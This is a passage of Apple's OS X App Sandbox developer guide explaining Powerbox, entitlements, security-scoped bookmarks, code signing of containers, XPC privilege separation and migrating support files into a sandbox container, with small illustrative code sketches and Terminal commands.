Powerbox and File System Access Outside of Your Container

Your sandboxed app can access file system locations outside of its container in the following three ways:

● At the specific direction of the user
● By using entitlements for specific file-system locations (described in “Entitlements and System Resource Access”)
● When the file system location is in certain directories that are world readable

The OS X security technology that interacts with the user to expand your sandbox is called Powerbox. Powerbox has no API. Your app uses Powerbox transparently when you use the NSOpenPanel and NSSavePanel classes. You enable Powerbox by setting an entitlement using Xcode, as described in “Enabling User-Selected File Access” in Entitlement Key Reference.

When you invoke an Open or Save dialog from your sandboxed app, the window that appears is presented not by AppKit but by Powerbox. Using Powerbox is automatic when you adopt App Sandbox; it requires no code change from the pre-sandbox version of your app. Accessory panels that you’ve implemented for opening or saving are faithfully rendered and used.

Note: When you adopt App Sandbox, there are some important behavioral differences for the NSOpenPanel and NSSavePanel classes, described in “Open and Save Dialog Behavior with App Sandbox”.

The security benefit provided by Powerbox is that it cannot be manipulated programmatically. Specifically, there is no mechanism for hostile code to use Powerbox for accessing the file system. Only a user, by interacting with Open and Save dialogs via Powerbox, can use those dialogs to reach portions of the file system outside of your previously established sandbox. For example, if a user saves a new document, Powerbox expands your sandbox to give your app read/write access to the document.

When a user of your app specifies they want to use a file or a folder, the system adds the associated path to your app’s sandbox. Say, for example, a user drags the ~/Documents folder onto your app’s Dock tile (or onto your app’s Finder icon, or into an open window of your app), thereby indicating they want to use that folder.
In response, the system makes the ~/Documents folder, its contents, and its subfolders available to your app.

If a user instead opens a specific file, or saves to a new file, the system makes the specified file, and that file alone, available to your app.

In addition, the system automatically permits a sandboxed app to:

● Connect to system input methods
● Invoke services chosen by the user from the Services menu (only those services flagged as “safe” by the service provider are available to a sandboxed app)
● Open files chosen by the user from the Open Recent menu
● Participate with other apps by way of user-invoked copy and paste
● Read files that are world readable, in certain directories, including the following directories:
  ● /bin
  ● /sbin
  ● /usr/bin
  ● /usr/lib
  ● /usr/sbin
  ● /usr/share
  ● /System

After a user has specified a file they want to use, that file is within your app’s sandbox. The file is then vulnerable to attack if your app is exploited by malicious code: App Sandbox provides no protection. To provide protection for the files within your sandbox, follow the recommendations in Secure Coding Guide.

A critical aspect of following user intent is that throughout OS X, simulation or alteration of user input is not allowed. This has implications for assistive apps, as described in “Determine Whether Your App Is Suitable for Sandboxing”.

By default, files opened or saved by the user remain within your sandbox until your app terminates, except for files that were open at the time that your app terminates. Such files reopen automatically by way of the OS X Resume feature the next time your app launches, and are automatically added back to your app’s sandbox.
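As noted earlier in this section, an app uses Powerbox simply by presenting an ordinary Open or Save dialog. The following is a minimal sketch of that pattern, not a definitive implementation. The helper names ConfigureFolderPanel and ChooseFolder are hypothetical, and the sketch assumes the target has the user-selected file access entitlement. NSModalResponseOK is available in OS X v10.9 and later; on earlier SDKs, compare against NSFileHandlingPanelOKButton instead.

```objc
#import <Cocoa/Cocoa.h>

// Hypothetical helper: configures an Open panel to select exactly one folder.
static void ConfigureFolderPanel(NSOpenPanel *panel) {
    panel.canChooseFiles = NO;
    panel.canChooseDirectories = YES;
    panel.allowsMultipleSelection = NO;
}

// Hypothetical helper: asks the user to pick a folder and passes the chosen
// URL (or nil if the user cancelled) to the completion block.
static void ChooseFolder(void (^completion)(NSURL *folderURL)) {
    NSOpenPanel *panel = [NSOpenPanel openPanel];
    ConfigureFolderPanel(panel);

    // In a sandboxed app this dialog is presented by Powerbox. The calling
    // code is the same as in an app that is not sandboxed.
    [panel beginWithCompletionHandler:^(NSInteger result) {
        completion(result == NSModalResponseOK ? panel.URL : nil);
    }];
}
```

The URL passed to the completion block refers to a location the user chose, so the system has already added it to the app’s sandbox for the rest of the current launch.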
To provide persistent access to resources located outside of your container, in a way that doesn’t depend on Resume, use security-scoped bookmarks as explained in “Security-Scoped Bookmarks and Persistent Resource Access”.

Open and Save Dialog Behavior with App Sandbox

Certain NSOpenPanel and NSSavePanel methods behave differently when App Sandbox is enabled for your app:

● You cannot invoke the OK button using the ok: method.
● You cannot rewrite the user’s selection using the panel:userEnteredFilename:confirmed: method from the NSOpenSavePanelDelegate protocol.

In addition, the effective, runtime inheritance path for the NSOpenPanel and NSSavePanel classes is different with App Sandbox, as illustrated in Table 2-2.

Table 2-2 Open and Save class inheritance with App Sandbox

Without App Sandbox    NSOpenPanel : NSSavePanel : NSPanel : NSWindow : NSResponder : NSObject
With App Sandbox       NSOpenPanel : NSSavePanel : NSObject

Because of this runtime difference, an NSOpenPanel or NSSavePanel object inherits fewer methods with App Sandbox. If you attempt to send a message to an NSOpenPanel or NSSavePanel object, and that method is defined in the NSPanel, NSWindow, or NSResponder classes, the system raises an exception. The Xcode compiler does not issue a warning or error to alert you to this runtime behavior.

Entitlements and System Resource Access

An app that is not sandboxed has access to all user-accessible system resources, including the built-in camera and microphone, network sockets, printing, and most of the file system. If successfully attacked by malicious code, such an app can behave as a hostile agent with wide-ranging potential to inflict harm.

When you enable App Sandbox for your app, you remove all but a minimal set of privileges and then deliberately restore them, one-by-one, using entitlements.
An entitlement is a key-value pair that identifies a specific capability, such as the capability to open an outbound network socket. One special entitlement, Enable App Sandboxing, turns on App Sandbox. When you enable sandboxing, Xcode creates a .entitlements property list file and shows it in the project navigator.

If your app requires a capability, request it by adding the corresponding entitlement to your Xcode project using the Summary tab of the target editor. If you don’t require a capability, take care to not include the corresponding entitlement.

You request entitlements on a target-by-target basis. If your app has a single target (the main application), you request entitlements only for that target. If you design your app to use a main application along with helpers (in the form of XPC services), you request entitlements individually, and as appropriate, for each target. You learn more about this in “External Tools, XPC Services, and Privilege Separation”.

You may require finer-grained control over your app’s entitlements than is available in the Xcode target editor. For example, you might request a temporary exception entitlement because App Sandbox does not support a capability your app needs, such as the ability to send Apple events. To work with temporary exception entitlements, use the Xcode property list editor to edit a target’s .entitlements property list file directly.

Note: If you request a temporary exception entitlement, be sure to follow the guidance regarding entitlements provided on the iTunes Connect website. In particular, use the Review Notes field in iTunes Connect to explain why your app needs the temporary exception.

OS X App Sandbox entitlements are described in “Enabling App Sandbox” in Entitlement Key Reference. For a walk-through of requesting an entitlement for a target in an Xcode project, see “App Sandbox Quick Start”.
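Because entitlements are key-value pairs embedded in the code signature, a running process can read its own values. The sketch below illustrates this under some assumptions: it uses the SecTask functions from the Security framework, the helper name ProcessHasEntitlement is hypothetical, and the keys shown in the usage note (com.apple.security.app-sandbox and com.apple.security.network.client) are the property list keys behind the Enable App Sandboxing and Allow Outgoing Network Connections checkboxes. It is meant for diagnostics, not as a required part of adopting App Sandbox.

```objc
#import <Foundation/Foundation.h>
#import <Security/SecTask.h>

// Hypothetical helper: returns YES if the running process's code signature
// carries the given Boolean entitlement with a true value.
static BOOL ProcessHasEntitlement(NSString *key) {
    SecTaskRef task = SecTaskCreateFromSelf(kCFAllocatorDefault);
    if (task == NULL) {
        return NO;
    }
    CFTypeRef value = SecTaskCopyValueForEntitlement(task, (__bridge CFStringRef)key, NULL);
    CFRelease(task);

    BOOL granted = NO;
    if (value != NULL) {
        // Boolean entitlements are returned as CFBoolean values.
        granted = (CFGetTypeID(value) == CFBooleanGetTypeID()) &&
                  CFBooleanGetValue((CFBooleanRef)value);
        CFRelease(value);
    }
    return granted;
}
```

For example, ProcessHasEntitlement(@"com.apple.security.app-sandbox") would be expected to return YES in the sandboxed Quick Start app, and ProcessHasEntitlement(@"com.apple.security.network.client") would be expected to return YES only after the outgoing network entitlement has been added.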
Security-Scoped Bookmarks and Persistent Resource Access

Your app’s access to file-system locations outside of its container, as granted to your app by way of user intent (such as through Powerbox), does not automatically persist across app launches or system restarts. When your app reopens, you have to start over. (The one exception to this is for files open at the time that your app terminates, which remain in your sandbox thanks to the OS X Resume feature.)

Starting in OS X v10.7.3, you can retain access to file-system resources by employing a security mechanism, known as security-scoped bookmarks, that preserves user intent. Here are a few examples of app features that can benefit from this:

● A user-selected download, processing, or output folder
● An image browser library file, which points to user-specified images at arbitrary locations
● A complex document format that supports embedded media stored in other locations

Two Distinct Types of Security-Scoped Bookmark

Security-scoped bookmarks, available starting in OS X v10.7.3, support two distinct use cases:

● An app-scoped bookmark provides your sandboxed app with persistent access to a user-specified file or folder.
  For example, if your app employs a download or processing folder that is outside of the app container, obtain initial access by presenting an NSOpenPanel dialog to obtain the user’s intent to use a specific folder. Then, create an app-scoped bookmark for that folder and store it as part of the app’s configuration (perhaps in a property list file or using the NSUserDefaults class). With the app-scoped bookmark, your app can obtain future access to the folder.
● A document-scoped bookmark provides a specific document with persistent access to a file.
  For example, a code editor typically supports the notion of a project document that refers to other files and needs persistent access to those files. Other examples are an image browser or editor that maintains an image library, in which the library file needs persistent access to the images it owns; or a word processor that supports embedded images, multimedia, or font files in its document format. In these cases, you configure the document format (of the project file, library file, word processing document, and so on) to be able to store security-scoped bookmarks to the files a document refers to.
  Obtain initial access to a referred item by asking for user intent to use that item. Then, create a document-scoped bookmark for the item and store the bookmark as part of the document’s data.
  A document-scoped bookmark can be resolved by any app that has access to the bookmark data itself and to the document that owns the bookmark. This supports portability, allowing a user, for example, to send a document to another user; the document’s secure bookmarks remain usable for the recipient. The document can be a flat file or a document distributed as a bundle.
  A document-scoped bookmark can point only to a file, not a folder, and only to a file that is not in a location used by the system (such as /private or /Library).

Using Security-Scoped Bookmarks

Using either type of security-scoped bookmark requires you to perform five steps:

1. Set the appropriate entitlement in the target that needs to use security-scoped bookmarks.
   Do this once per target as part of configuring your Xcode project.
2. Create a security-scoped bookmark.
   Do this when a user has indicated intent (such as via Powerbox) to use a file-system resource outside of your app’s container, and you want to preserve your app’s ability to access the resource.
3. Resolve the security-scoped bookmark.
   Do this when your app later (for example, after app relaunch) needs access to a resource you bookmarked in step 2.
The result of this step is a security-scoped URL. 4. Explicitly indicate that you want to use the file-system resource whose URL you obtained in step 3. Do this immediately after obtaining the security-scoped URL (or, when you later want to regain access to the resource after having relinquished your access to it). 5. When done using the resource, explicitly indicate that you want to stop using it. Do this as soon as you know that you no longer need access to the resource (typically, after you close it). After you relinquish access to a file-system resource, to use that resource again you must return to step 4 (to again indicate you want to use the resource). If your app is relaunched, you must return to step 3 (to resolve the security-scoped bookmark). App Sandbox in Depth Security-Scoped Bookmarks and Persistent Resource Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 22The first step in the preceding list, requesting entitlements, is the prerequisite for using either type of security-scoped bookmark. Perform this step as follows: ● To use app-scoped bookmarksin a target,setthe com.apple.security.files.bookmarks.app-scope entitlement value to true. ● To use document-scoped bookmarks in a target, set the com.apple.security.files.bookmarks.document-scope entitlement value to true. You can request either or both of these entitlements in a target, as needed. These entitlements are available starting in OS X v10.7.3 and are described in “Enabling Security-Scoped Bookmark and URL Access” in Entitlement Key Reference . With the appropriate entitlements, you can create a security-scoped bookmark by calling the bookmarkDataWithOptions:includingResourceValuesForKeys:relativeToURL:error: method of the NSURL class (or its Core Foundation equivalent, the CFURLCreateBookmarkData function). 
When you later need access to a bookmarked resource, resolve its security-scoped bookmark by calling the the URLByResolvingBookmarkData:options:relativeToURL:bookmarkDataIsStale:error:method of the NSURL class (or its Core Foundation equivalent, the CFURLCreateByResolvingBookmarkData function). In a sandboxed app, you cannot access the file-system resource that a security-scoped URL points to until you call the startAccessingSecurityScopedResource method (or its Core Foundation equivalent, the CFURLStartAccessingSecurityScopedResource function) on the URL. When you no longer need access to a resource that you obtained using security scope (typically, after you close the resource) you must call the stopAccessingSecurityScopedResource method (or its Core Foundation equivalent, the CFURLStopAccessingSecurityScopedResource function) on the resource’s URL. Calls to start and stop access are nestable on a per-process basis. This means that if your app calls the start method on a URL twice, to fully relinquish access to the referenced resource you must call the corresponding stop method twice. If you call the stop method on a URL whose referenced resource you do not have access to, nothing happens. Warning: You must balance every call to the startAccessingSecurityScopedResource method with a corresponding call to the stopAccessingSecurityScopedResource method. If you fail to relinquish your access when you no longer need a file-system resource, your app leaks kernel resources. If sufficient kernel resources are leaked, your app loses its ability to add file-system locations to its sandbox, such as via Powerbox or security-scoped bookmarks, until relaunched. App Sandbox in Depth Security-Scoped Bookmarks and Persistent Resource Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 
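The nesting rule for start and stop calls can be illustrated with a small counting model. The sketch below is only a toy written in Python; it does not call NSURL or Core Foundation, and the class name ScopedAccessModel and its methods are hypothetical names introduced for illustration. It assumes the behavior stated above: each start call must be matched by one stop call, and a stop call without access does nothing.

```python
class ScopedAccessModel:
    """Toy model of nestable start/stop access (not the real NSURL API)."""

    def __init__(self):
        # Maps a URL string to the number of start calls not yet balanced.
        self._counts = {}

    def start(self, url):
        """Record one more outstanding start call for this URL."""
        self._counts[url] = self._counts.get(url, 0) + 1

    def stop(self, url):
        """Balance one start call; do nothing if there is no access."""
        count = self._counts.get(url, 0)
        if count == 0:
            return  # stopping without access: nothing happens
        if count == 1:
            del self._counts[url]  # access fully relinquished
        else:
            self._counts[url] = count - 1

    def has_access(self, url):
        """True while at least one start call is still unbalanced."""
        return self._counts.get(url, 0) > 0

    def unbalanced(self):
        """URLs whose start calls were never fully balanced (the leak case)."""
        return sorted(self._counts)
```

In this model, calling start twice and stop once leaves has_access true, which mirrors the requirement to call the stop method twice. Anything still listed by unbalanced() when the app has finished with its resources corresponds to the leak described in the warning.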
For detailed descriptions of the methods, constants, and entitlements to use for implementing security-scoped bookmarks in your app, read NSURL Class Reference or CFURL Reference, and read “Enabling Security-Scoped Bookmark and URL Access” in Entitlement Key Reference.

App Sandbox and Code Signing

After you enable App Sandbox and specify other entitlements for a target in your Xcode project, you must code sign the project. Take note of the distinction between how you set entitlements and how you set a code signing identity:

● Use the Xcode target editor to set entitlements on a target-by-target basis.
● Use the Xcode project build settings to set the code signing identity for a project as a whole.

You must perform code signing because entitlements (including the special entitlement that enables App Sandbox) are built into an app’s code signature. From another perspective, an unsigned app is not sandboxed and has only default entitlements, regardless of settings you’ve applied in the Xcode target editor.

OS X enforces a tie between an app’s container and the app’s code signature. This important security feature ensures that no other sandboxed app can access your container. The mechanism works as follows: After the system creates a container for an app, each time an app with the same bundle ID launches, the system checks that the app’s code signature matches a code signature expected by the container. If the system detects a mismatch, it prevents the app from launching.

OS X’s enforcement of container integrity impacts your development and distribution cycle. This is because, in the course of creating and distributing an app, the app is code signed using various signatures. Here’s how the process works:

1. Before you create a project, you obtain two code signing certificates from Apple: a development certificate and a distribution certificate. (To learn how to obtain code signing certificates, read “Creating Signing Certificates” in Tools Workflow Guide for Mac.)
   For development and testing, you sign your app with the development code signature.
2. When the Mac App Store distributes your app, it is signed with an Apple code signature.

For testing and debugging, you may want to run both versions of your app: the version you sign and the version Apple signs. But OS X sees the Apple-signed version of your app as an intruder and won’t allow it to launch: Its code signature does not match the one expected by your app’s existing container.

If you try to run the Apple-signed version of your app, you get a crash report containing a statement similar to this:

    Exception Type: EXC_BAD_INSTRUCTION (SIGILL)

The solution is to adjust the access control list (ACL) on your app’s container to recognize the Apple-signed version of your app. Specifically, you add the designated code requirement of the Apple-signed version of your app to the app container’s ACL.

To adjust an ACL to recognize an Apple-signed version of your app

1. Open Terminal (in /Applications/Utilities).
2. Open a Finder window that contains the Apple-signed version of your app.
3. In Terminal, enter the following command:

    asctl container acl add -file <path/to/app>

   In place of the <path/to/app> placeholder, substitute the path to the Apple-signed version of your app. Instead of manually typing the path, you can drag the app’s Finder icon to the Terminal window.

The container’s ACL now includes the designated code requirements for both versions of your app. OS X then allows you to run either version of your app.

You can use this same technique to share a container between (1) a version of an app that you initially signed with a self-generated code signature, such as the one you created in “App Sandbox Quick Start” (page 8), and (2) a later version that you signed with a development code signature from Apple.

You can view the list of code requirements in a container’s ACL. For example, after adding the designated code requirement for the Apple-signed version of your app, you can confirm that the container’s ACL lists two permissible code requirements.

To display the list of code requirements in a container’s ACL

1. Open Terminal (in /Applications/Utilities).
2. In Terminal, enter the following command:

    asctl container acl list -bundle <container name>

   In place of the <container name> placeholder, substitute the name of your app’s container directory. (The name of your app’s container directory is typically the same as your app’s bundle identifier.)

For more information about working with App Sandbox container access control lists and their code requirements, read the man page for the asctl (App Sandbox control) tool.

External Tools, XPC Services, and Privilege Separation

Some app operations are more likely to be targets of malicious exploitation. Examples are the parsing of data received over a network, and the decoding of video frames. By using XPC, you can improve the effectiveness of the damage containment offered by App Sandbox by separating such potentially dangerous activities into their own address spaces.

XPC is an OS X interprocess communication technology that complements App Sandbox by enabling privilege separation. Privilege separation, in turn, is a development strategy in which you divide an app into pieces according to the system resource access that each piece needs. The component pieces that you create are called XPC services.

You create an XPC service as an individual target in your Xcode project. Each service gets its own sandbox; specifically, it gets its own container and its own set of entitlements. In addition, an XPC service that you include with your app is accessible only by your app. These advantages add up to making XPC the best technology for implementing privilege separation in an OS X app.
By contrast, a child process created by using the posix_spawn function, by calling fork and exec (discouraged), or by using the NSTask class simply inherits the sandbox of the process that created it. You cannot configure a child process’s entitlements. For these reasons, child processes do not provide effective privilege separation.

To use XPC with App Sandbox:

● Confer minimal privileges to each XPC service, according to its needs.
● Design the data transfers between the main app and each XPC service to be secure.
● Structure your app’s bundle appropriately.

The life cycle of an XPC service, and its integration with Grand Central Dispatch (GCD), is managed entirely by the system. To obtain this support, you need only to structure your app’s bundle correctly.

For more on XPC, see “Creating XPC Services” in Daemons and Services Programming Guide.

Designing for App Sandbox

There’s a common, basic workflow for designing or converting an app for App Sandbox. The specific steps to take for your particular app, however, are as unique as your app. To create a work plan for adopting App Sandbox, use the process outlined here, along with the conceptual understanding you have from the earlier chapters in this document.

Six Steps for Adopting App Sandbox

The workflow to convert an OS X app to work in a sandbox typically consists of the following six steps:

1. Determine whether your app is suitable for sandboxing.
2. Design a development and distribution strategy.
3. Resolve API incompatibilities.
4. Apply the App Sandbox entitlements you need.
5. Add privilege separation using XPC.
6. Implement a migration strategy.

Determine Whether Your App Is Suitable for Sandboxing

Most OS X apps are fully compatible with App Sandbox. If you need behavior in your app that App Sandbox does not allow, consider an alternative approach. For example, if your app depends on hard-coded paths to locations in the user’s home directory, consider the advantages of using Cocoa and Core Foundation path-finding APIs, which use the sandbox container instead.

If you choose to not sandbox your app now, or if you determine that you need a temporary exception entitlement, use Apple’s bug reporting system to let Apple know what’s not working for you. Apple considers feature requests as it develops the OS X platform. Also, if you request a temporary exception, be sure to use the Review Notes field in iTunes Connect to explain why the exception is needed.

The following app behaviors are incompatible with App Sandbox:

● Use of Authorization Services
  With App Sandbox, you cannot do work with the functions described in Authorization Services C Reference.
● Use of accessibility APIs in assistive apps
  With App Sandbox, you can and should enable your app for accessibility, as described in Accessibility Overview for OS X. However, you cannot sandbox an assistive app such as a screen reader, and you cannot sandbox an app that controls another app.
● Sending Apple events to arbitrary apps
  With App Sandbox, you can receive Apple events and respond to Apple events, but you cannot send Apple events to arbitrary apps. By using a temporary exception entitlement, you can enable the sending of Apple events to a list of specific apps that you specify, as described in Entitlement Key Reference.
● Sending user-info dictionaries in broadcast notifications to other tasks
  With App Sandbox, you cannot include a user-info dictionary when posting to an NSDistributedNotificationCenter object for messaging other tasks. (You can, as usual, include a user-info dictionary when messaging other parts of your app by way of posting to an NSNotificationCenter object.)
● Loading kernel extensions
  Loading of kernel extensions is prohibited with App Sandbox.
● Simulation of user input in Open and Save dialogs
  If your app depends on programmatically manipulating Open or Save dialogs to simulate or alter user input, your app is unsuitable for sandboxing.
● Setting preferences on other apps
  With App Sandbox, each app maintains its preferences inside its container. Your app has no access to the preferences of other apps.
● Configuring network settings
  With App Sandbox, your app cannot modify the system’s network configuration (whether with the System Configuration framework, the CoreWLAN framework, or other similar APIs) because doing so requires administrator privileges.
● Terminating other apps
  With App Sandbox, you cannot use the NSRunningApplication class to terminate other apps.

Design a Development and Distribution Strategy

During development, you may have occasion to run versions of your app that are signed with different code signatures. After you’ve run your app signed using one signature, the system won’t allow a second version of your app, signed with a second signature, to launch unless you modify the app’s container. Be sure to understand how to handle this, as described in “App Sandbox and Code Signing” (page 24), as you design your development strategy.

When a customer first launches a sandboxed version of your app, the system creates a container for your app. The access control list (ACL) for the container is established at that time, and the ACL is tied to the code signature of that version of your app. The implication for you is that all future versions of the app that you distribute must use the same code signature.

To learn how to obtain code signing certificates from Apple, read “Creating Signing Certificates” in Tools Workflow Guide for Mac.
Resolve API Incompatibilities

If you are using OS X APIs in ways that were not intended, or in ways that expose user data to attack, you may encounter incompatibilities with App Sandbox. This section provides some examples of app design that are incompatible with App Sandbox and suggests what you can do instead.

Opening, Saving, and Tracking Documents

If you are managing documents using any technology other than the NSDocument class, you should convert to using this class to benefit from its built-in App Sandbox support. The NSDocument class automatically works with Powerbox. NSDocument also provides support for keeping documents within your sandbox if the user moves them using the Finder.

Remember that the inheritance path of the NSOpenPanel and NSSavePanel classes is different when your app is sandboxed. See “Open and Save Dialog Behavior with App Sandbox” (page 19).

If you don’t use the NSDocument class to manage your app’s documents, you can craft your own file-system support for App Sandbox by using the NSFileCoordinator class and the NSFilePresenter protocol.

Retaining Access to File System Resources

If your app depends on persistent access to file system resources outside of your app’s container, you need to adopt security-scoped bookmarks as described in “Security-Scoped Bookmarks and Persistent Resource Access” (page 21).

Creating a Login Item for Your App

To create a login item for your sandboxed app, use the SMLoginItemSetEnabled function (declared in ServiceManagement/SMLoginItem.h) as described in “Adding Login Items Using the Service Management Framework” in Daemons and Services Programming Guide.

(With App Sandbox, you cannot create a login item using functions in the LSSharedFileList.h header file. For example, you cannot use the function LSSharedFileListInsertItemURL. Nor can you manipulate the state of launch services, such as by using the function LSRegisterURL.)

Accessing User Data

OS X path-finding APIs, above the POSIX layer, return paths relative to the container instead of relative to the user’s home directory. If your app, before you sandbox it, accesses locations in the user’s actual home directory (~) and you are using Cocoa or Core Foundation APIs, then, after you enable sandboxing, your path-finding code automatically uses your app’s container instead.

For first launch of your sandboxed app, OS X automatically migrates your app’s main preferences file. If your app uses additional support files, perform a one-time migration of those files to the container, as described in “Migrating an App to a Sandbox” (page 33).

If you are using a POSIX function such as getpwuid to obtain the path to the user’s actual home directory, consider instead using a Cocoa or Core Foundation symbol such as the NSHomeDirectory function. By using Cocoa or Core Foundation, you support the App Sandbox restriction against directly accessing the user’s home directory.

If your app requires access to the user’s home directory in order to function, let Apple know about your needs using the Apple bug reporting system. In addition, be sure to follow the guidance regarding entitlements provided on the iTunes Connect website.

Accessing Preferences of Other Apps

Because App Sandbox directs path-finding APIs to the container for your app, reading or writing to the user’s preferences takes place within the container. Preferences for other sandboxed apps are inaccessible. Preferences for apps that are not sandboxed are placed in the ~/Library/Preferences directory, which is also inaccessible to your sandboxed app.

If your app requires access to another app’s preferences in order to function (for example, if it requires access to the playlists that a user has defined for iTunes), let Apple know about your needs using the Apple bug reporting system. In addition, be sure to follow the guidance regarding entitlements provided on the iTunes Connect website.

With these provisos in mind, you can use a path-based temporary exception entitlement to gain programmatic access to the user’s ~/Library/Preferences folder. Use a read-only entitlement to avoid opening the user’s preferences to malicious exploitation. A POSIX function, such as getpwuid, can provide the file system path you need. For details on entitlements, see Entitlement Key Reference.

Apply the App Sandbox Entitlements You Need

To adopt App Sandbox for a target in an Xcode project, apply the value true to the com.apple.security.app-sandbox entitlement key for that target. Do this in the Xcode target editor by selecting the Enable App Sandboxing checkbox.

Apply other entitlements as needed. For a complete list, refer to Entitlement Key Reference.

Important: App Sandbox protects user data most effectively when you minimize the entitlements you request. Take care not to request entitlements for privileges your app does not need. Consider whether making a change in your app could eliminate the need for an entitlement.

Here’s a basic workflow to use to determine which entitlements you need:

1. Run your app and exercise its features.
2. In the Console app (available in /Applications/Utilities/), look for sandboxd violations in the All Messages system log query.
   Each such violation indicates that your app attempted to do something not allowed by your sandbox.
   Here’s what a sandboxd violation looks like in Console:

    3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny network-outbound 111.30.222.15:80
    3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny system-socket

   Click the paperclip icon to the right of a violation message to view the backtrace that shows what led to the violation.
3. For each sandboxd violation you find, determine how to resolve the problem. In some cases, a simple change to your app, such as using your Container instead of other file system locations, solves the problem. In other cases, applying an App Sandbox entitlement using the Xcode target editor is the best choice.
4. Using the Xcode target editor, enable the entitlement that you think will resolve the violation.
5. Run the app and exercise its features again.
   Either confirm that you have resolved the sandboxd violation, or investigate further.

If you choose not to sandbox your app now or to use a temporary exception entitlement, use Apple’s bug reporting system to let Apple know about the issue you are encountering. Apple considers feature requests as it develops the OS X platform. Also, be sure to use the Review Notes field in iTunes Connect to explain why the exception is needed.

Add Privilege Separation Using XPC

When developing for App Sandbox, look at your app’s behaviors in terms of privileges and access. Consider the potential benefits to security and robustness of separating high-risk operations into their own XPC services.

When you determine that a feature should be placed into an XPC service, do so by referring to “Creating XPC Services” in Daemons and Services Programming Guide.

Implement a Migration Strategy

Ensure that customers who are currently using a pre-sandbox version of your app experience a painless upgrade when they install the sandboxed version. For details on how to implement a container migration manifest, read “Migrating an App to a Sandbox” (page 33).

Migrating an App to a Sandbox

An app that is not sandboxed places its support files in locations that are inaccessible to a sandboxed version of the same app.
For example, the typical locations for support files are shown here:

    Location           Path
    Legacy location    ~/Library/Application Support/<app_name>/
    Sandbox location   ~/Library/Containers/<bundle_id>/Data/Library/Application Support/<app_name>/

As you can see, the sandbox location for the Application Support directory is within an app’s container, which gives the sandboxed app unrestricted read/write access to those files. If you previously distributed your app without sandboxing and you now want to provide a sandboxed version, you must move support files into their new, sandbox-accessible locations.

Note: The system automatically migrates your app’s preferences file (~/Library/Preferences/com.yourCompany.YourApp.plist) on first launch of your sandboxed app.

OS X provides support-file migration, on a per-user basis, when a user first launches the sandboxed version of your app. This support depends on a special property list file you create, called a container migration manifest.

A container migration manifest consists of an array of strings that identify the support files and directories you want to migrate when a user first launches the sandboxed version of your app. The file’s name must be container-migration.plist.

For each file or directory you specify for migration, you have a choice of allowing the system to place the item appropriately in your container, or explicitly specifying the destination location.

OS X moves (it does not copy) the files and directories you specify in a container migration manifest. That is, the files and directories migrated into your app’s container no longer exist at their original locations. In addition, container migration is a one-way process: You are responsible for providing a way to undo it, should you need to do so during development or testing. The section “Undoing a Migration for Testing” (page 36) provides a suggestion about this.
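To make the relationship between the two locations concrete, here is a minimal Python sketch that builds both paths and imitates the move-not-copy behavior on an ordinary directory tree. It is an illustration only: the real migration is performed by OS X, not by app code. The function names are hypothetical, and the sketch assumes that the variable parts of the two paths are the app's support-folder name and its container directory name (typically the bundle identifier).

```python
import shutil
from pathlib import Path


def support_locations(home, bundle_id, app_name):
    """Return (legacy, sandbox) Application Support paths for an app."""
    home = Path(home)
    legacy = home / "Library" / "Application Support" / app_name
    sandbox = (home / "Library" / "Containers" / bundle_id / "Data"
               / "Library" / "Application Support" / app_name)
    return legacy, sandbox


def simulate_move(home, bundle_id, app_name):
    """Imitate migration: move (not copy) the legacy folder into the container."""
    legacy, sandbox = support_locations(home, bundle_id, app_name)
    sandbox.parent.mkdir(parents=True, exist_ok=True)
    shutil.move(str(legacy), str(sandbox))  # legacy path no longer exists afterward
    return sandbox
```

Running simulate_move against a scratch directory shows the point made above: after the move, the legacy folder is gone, so any test setup needs its own backup.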
Creating a Container Migration Manifest

To support migration of app support files when a user first launches the sandboxed version of your app, create a container migration manifest.

To create and add a container migration manifest to an Xcode project

1. Add a property list file to the Xcode project.
   The Property List template is in the OS X “Resource” group in the file template dialog.

   Important: Be sure to name the file container-migration.plist, spelled and lowercased exactly this way.

2. Add a Move property to the container migration manifest.
   The Move property is the lone top-level key in a container migration manifest. You add it to the empty file as follows:
   ● Right-click the empty editor for the new .plist file, then choose Add Row.
   ● In the Key column, enter Move as the name of the key. You must use this exact casing and spelling.
   ● In the Type column, choose Array.
3. Add a string to the Move array for the first file or folder you want to migrate.
   For example, suppose you want to migrate your Application Support directory (along with its contained files and subdirectories) to your container. If your directory is called App Sandbox Quick Start and is currently within the ~/Library/Application Support directory, use the following string as the value for the new property list item:

    ${ApplicationSupport}/App Sandbox Quick Start

   No trailing slash character is required, and space characters are permitted. The search-path constant in the path is equivalent to ~/Library/Application Support. This constant is described, along with other commonly used directories, in “Use Variables to Specify Support-File Directories” (page 37).

Similarly, add additional strings to identify the original (before sandboxing) paths of additional files or folders you want to migrate.
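The same file can also be produced outside the Xcode property list editor. The following Python sketch uses the standard plistlib module to serialize a dictionary with a single Move key holding an array of strings, which is the structure the steps above build by hand. The function name simple_manifest is hypothetical, and the sketch assumes that an XML property list written by plistlib is an acceptable form of the file.

```python
import plistlib

# The required file name, as stated in the steps above.
MANIFEST_NAME = "container-migration.plist"


def simple_manifest(origin_paths):
    """Serialize a manifest whose Move array holds plain origin-path strings."""
    return plistlib.dumps({"Move": list(origin_paths)})


def write_manifest(directory, origin_paths):
    """Write the manifest into the given directory and return its path."""
    path = f"{directory}/{MANIFEST_NAME}"
    with open(path, "wb") as handle:
        handle.write(simple_manifest(origin_paths))
    return path
```

For the example in step 3, simple_manifest(["${ApplicationSupport}/App Sandbox Quick Start"]) yields a property list with the Move key and one string entry.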
When you specify a directory to be moved, keep in mind that the move is recursive: it includes all the subdirectories and files within the directory you specify.

Before you first test a migration manifest, provide a way to undo the migration, such as suggested in “Undoing a Migration for Testing” (page 36).

To test a container migration manifest

1. In the Finder, open two windows as follows:
   ● In one window, view the contents of the ~/Library/Containers/ directory.
   ● In the other window, view the contents of the directory containing the support files named in the container migration manifest (that is, the files you want to migrate).
2. Build and run the Xcode project.

Upon successful migration, the support files disappear from the original (nonsandbox) directory and appear in your app’s container.

If you want to alter the arrangement of support files during migration, use a slightly more complicated .plist structure. Specifically, for a file or directory whose migration destination you want to control, provide both a starting and an ending path. The ending path is relative to the Data directory in your container. In specifying an ending path, you can use any of the search-path constants described in “Use Variables to Specify Support-File Directories” (page 37).

If your destination path specifies a custom directory (one that isn’t part of a standard container), the system creates the directory during migration.

The following task assumes that you’re using the Xcode property list editor and working with the container migration manifest you created earlier in this chapter.

